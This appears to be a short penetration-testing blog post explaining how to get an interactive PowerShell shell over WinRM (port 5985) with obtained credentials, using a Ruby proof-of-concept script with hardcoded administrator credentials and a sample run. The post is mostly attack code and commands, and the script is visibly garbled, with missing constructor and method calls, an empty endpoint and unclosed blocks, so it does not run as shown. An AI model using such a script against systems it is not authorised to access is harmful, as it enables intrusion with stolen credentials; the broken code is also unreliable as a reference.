Winrm Shell

Windows Remote Management, or WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. Source: link

If you have obtained the credentials of winrm and you are able to access port 5985/wsman, you may use the below PoC to obtain a powershell shell.

The default HTTP port for winrm is 5985.

[email protected]:~# gem install winrm
[email protected]:~# cat winrm_shell.rb
require 'winrm'

conn =
  endpoint: '',
  user: 'administrator',
  password: 'administrator123',

command="" do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets        
        output = do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
    puts "Exiting with code #{output.exitcode}"

[email protected]:~#
[email protected]:~#

Run the ruby script and obtain the shell. Make sure to install winrm before running the PoC above.

[email protected]:~# ruby winrm_shell.rb
PS > whoami
PS >

Leave a Comment